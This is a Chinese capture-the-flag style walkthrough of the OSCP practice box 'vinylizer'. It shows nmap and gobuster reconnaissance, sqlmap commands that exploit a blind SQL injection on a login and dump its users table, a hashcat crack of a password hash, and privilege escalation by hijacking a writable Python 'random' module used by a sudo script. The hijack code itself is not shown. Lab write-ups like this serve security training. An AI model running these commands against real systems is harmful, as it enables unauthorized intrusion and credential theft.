【OSCP】vinylizer

OSCP 靶场

靶场介绍

vinylizer

easy

常规信息收集、漏洞挖掘、sql盲注、python库劫持提权

信息收集

主机发现

nmap -sn 192.168.31.0/24

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.10  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 03:43 EST
Nmap scan report for 192.168.31.10
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)
|_  256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Vinyl Records Marketplace
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:6D:EC:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 192.168.31.10

目录扫描

 gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.10 -x php,html,txt -e

漏洞挖掘

经测试发现登录处存在sql盲注

dump 账号密码

sqlmap -r 1.txt  -p username -D vinyl_marketplace --tables
sqlmap -r 1.txt  -p username -D vinyl_marketplace -T users --columns 
sqlmap -r 1.txt  -p username -D vinyl_marketplace -T users -C username,password --dump

hashcat -a 0 -m 0 "9432522ed1a8fca612b11c3980a031f6" /usr/share/wordlists/rockyou.txt

权限获取

通过爆破hash 得到ssh账号密码,成功获取系统权限

权限提升

使用sudo -l  发现vinylizer.py 脚本具有sudo权限

查看脚本可以看到里面调用了random 模块，结合linpeas.sh 脚本发现random 具有写的权限。那么我们可以尝试python库劫持进行提权。

使用linpeas.sh 脚本扫描到可写文件。我们也可以使用如下命令：

find / -type f -writable 2>/dev/null

可以看到权限和属性

接下来我们添加如下代码，进行python 库劫持

sudo /usr/bin/python3 /opt/vinylizer.py

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】vinylizer